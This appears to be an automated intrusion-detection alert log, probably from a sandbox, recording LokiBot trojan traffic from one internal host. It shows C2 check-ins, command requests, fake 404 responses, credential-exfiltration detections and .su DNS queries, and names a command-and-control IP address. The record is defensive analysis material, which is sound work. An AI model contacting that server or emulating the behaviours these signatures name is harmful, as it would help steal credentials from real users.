Timestamp:	192.168.2.695.213.216.20249733802025381 11/24/22-19:55:23.201569
SID:	2025381
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249753802021641 11/24/22-19:56:03.443038
SID:	2021641
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249724802024313 11/24/22-19:55:03.741584
SID:	2024313
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864404532014169 11/24/22-19:55:42.774058
SID:	2014169
Source Port:	64404
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249726802025381 11/24/22-19:55:07.738200
SID:	2025381
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249747802024318 11/24/22-19:55:51.131718
SID:	2024318
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249725802825766 11/24/22-19:55:05.694279
SID:	2825766
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249712802021641 11/24/22-19:54:40.926341
SID:	2021641
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249747802024313 11/24/22-19:55:51.131718
SID:	2024313
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852865532014169 11/24/22-19:55:37.629169
SID:	2014169
Source Port:	52865
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497462025483 11/24/22-19:55:50.859980
SID:	2025483
Source Port:	80
Destination Port:	49746
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249699802021641 11/24/22-19:54:15.956073
SID:	2021641
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249724802024318 11/24/22-19:55:03.741584
SID:	2024318
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497552025483 11/24/22-19:56:08.689068
SID:	2025483
Source Port:	80
Destination Port:	49755
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249719802021641 11/24/22-19:54:53.033944
SID:	2021641
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497442025483 11/24/22-19:55:46.796463
SID:	2025483
Source Port:	80
Destination Port:	49744
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497272025483 11/24/22-19:55:11.470809
SID:	2025483
Source Port:	80
Destination Port:	49727
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.863863532014169 11/24/22-19:54:46.995919
SID:	2014169
Source Port:	63863
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249716802021641 11/24/22-19:54:48.704817
SID:	2021641
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249751802025381 11/24/22-19:55:59.376338
SID:	2025381
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249714802025381 11/24/22-19:54:45.091814
SID:	2025381
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249722802021641 11/24/22-19:54:59.769485
SID:	2021641
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497222025483 11/24/22-19:55:01.407205
SID:	2025483
Source Port:	80
Destination Port:	49722
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249720802025381 11/24/22-19:54:54.960633
SID:	2025381
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853203532014169 11/24/22-19:54:18.123294
SID:	2014169
Source Port:	53203
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249700802825766 11/24/22-19:54:18.249997
SID:	2825766
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249737802024318 11/24/22-19:55:31.199874
SID:	2024318
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249740802024313 11/24/22-19:55:37.776321
SID:	2024313
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249742802025381 11/24/22-19:55:40.973542
SID:	2025381
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497052025483 11/24/22-19:54:28.634655
SID:	2025483
Source Port:	80
Destination Port:	49705
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249731802021641 11/24/22-19:55:19.158567
SID:	2021641
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.857686532014169 11/24/22-19:54:13.553924
SID:	2014169
Source Port:	57686
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.858595532014169 11/24/22-19:54:28.961973
SID:	2014169
Source Port:	58595
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249736802025381 11/24/22-19:55:29.163584
SID:	2025381
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249745802025381 11/24/22-19:55:47.082758
SID:	2025381
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.857515532014169 11/24/22-19:55:48.986225
SID:	2014169
Source Port:	57515
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249734802024318 11/24/22-19:55:25.189583
SID:	2024318
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497002025483 11/24/22-19:54:20.029122
SID:	2025483
Source Port:	80
Destination Port:	49700
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249725802021641 11/24/22-19:55:05.694279
SID:	2021641
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249734802024313 11/24/22-19:55:25.189583
SID:	2024313
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249743802024318 11/24/22-19:55:42.875605
SID:	2024318
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249728802024318 11/24/22-19:55:11.780324
SID:	2024318
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249737802024313 11/24/22-19:55:31.199874
SID:	2024313
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249728802024313 11/24/22-19:55:11.780324
SID:	2024313
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249739802025381 11/24/22-19:55:35.259290
SID:	2025381
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.855956532014169 11/24/22-19:55:46.990731
SID:	2014169
Source Port:	55956
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249743802024313 11/24/22-19:55:42.875605
SID:	2024313
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249709802024313 11/24/22-19:54:33.518227
SID:	2024313
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249738802021641 11/24/22-19:55:33.192742
SID:	2021641
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859082532014169 11/24/22-19:54:38.013432
SID:	2014169
Source Port:	59082
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249740802024318 11/24/22-19:55:37.776321
SID:	2024318
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249722802825766 11/24/22-19:54:59.769485
SID:	2825766
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851530532014169 11/24/22-19:54:52.685795
SID:	2014169
Source Port:	51530
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249701802025381 11/24/22-19:54:22.087876
SID:	2025381
Source Port:	49701
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249723802025381 11/24/22-19:55:01.692450
SID:	2025381
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249721802024313 11/24/22-19:54:56.896268
SID:	2024313
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249750802021641 11/24/22-19:55:57.329298
SID:	2021641
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249715802024318 11/24/22-19:54:47.405096
SID:	2024318
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497302025483 11/24/22-19:55:17.735946
SID:	2025483
Source Port:	80
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249716802825766 11/24/22-19:54:48.704817
SID:	2825766
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249721802024318 11/24/22-19:54:56.896268
SID:	2024318
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860032532014169 11/24/22-19:55:29.068969
SID:	2014169
Source Port:	60032
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249744802021641 11/24/22-19:55:45.028740
SID:	2021641
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497412025483 11/24/22-19:55:40.700457
SID:	2025483
Source Port:	80
Destination Port:	49741
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497492025483 11/24/22-19:55:57.050677
SID:	2025483
Source Port:	80
Destination Port:	49749
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249709802024318 11/24/22-19:54:33.518227
SID:	2024318
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249715802024313 11/24/22-19:54:47.405096
SID:	2024313
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.858917532014169 11/24/22-19:55:11.700175
SID:	2014169
Source Port:	58917
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249745802024318 11/24/22-19:55:47.082758
SID:	2024318
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497342025483 11/24/22-19:55:26.886961
SID:	2025483
Source Port:	80
Destination Port:	49734
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249742802021641 11/24/22-19:55:40.973542
SID:	2021641
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497362025483 11/24/22-19:55:30.902353
SID:	2025483
Source Port:	80
Destination Port:	49736
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497382025483 11/24/22-19:55:34.897313
SID:	2025483
Source Port:	80
Destination Port:	49738
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497322025483 11/24/22-19:55:22.836179
SID:	2025483
Source Port:	80
Destination Port:	49732
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249739802021641 11/24/22-19:55:35.259290
SID:	2021641
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249741802825766 11/24/22-19:55:39.990050
SID:	2825766
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249728802025381 11/24/22-19:55:11.780324
SID:	2025381
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249745802024313 11/24/22-19:55:47.082758
SID:	2024313
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249713802825766 11/24/22-19:54:43.021097
SID:	2825766
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249746802025381 11/24/22-19:55:49.078874
SID:	2025381
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853731532014169 11/24/22-19:54:11.254500
SID:	2014169
Source Port:	53731
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249702802024318 11/24/22-19:54:25.054966
SID:	2024318
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249713802025381 11/24/22-19:54:43.021097
SID:	2025381
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249738802825766 11/24/22-19:55:33.192742
SID:	2825766
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861089532014169 11/24/22-19:55:53.045222
SID:	2014169
Source Port:	61089
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249714802021641 11/24/22-19:54:45.091814
SID:	2021641
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249720802024313 11/24/22-19:54:54.960633
SID:	2024313
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249702802024313 11/24/22-19:54:25.054966
SID:	2024313
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249720802024318 11/24/22-19:54:54.960633
SID:	2024318
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249731802025381 11/24/22-19:55:19.158567
SID:	2025381
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249735802024313 11/24/22-19:55:27.170416
SID:	2024313
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249698802024317 11/24/22-19:54:13.981663
SID:	2024317
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249698802024312 11/24/22-19:54:13.981663
SID:	2024312
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249729802021641 11/24/22-19:55:13.852615
SID:	2021641
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249721802025381 11/24/22-19:54:56.896268
SID:	2025381
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249731802825766 11/24/22-19:55:19.158567
SID:	2825766
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249712802024313 11/24/22-19:54:40.926341
SID:	2024313
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249712802024318 11/24/22-19:54:40.926341
SID:	2024318
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249735802024318 11/24/22-19:55:27.170416
SID:	2024318
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249724802021641 11/24/22-19:55:03.741584
SID:	2021641
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249748802825766 11/24/22-19:55:53.130311
SID:	2825766
Source Port:	49748
Destination Port:	80
Protocol:	TCP
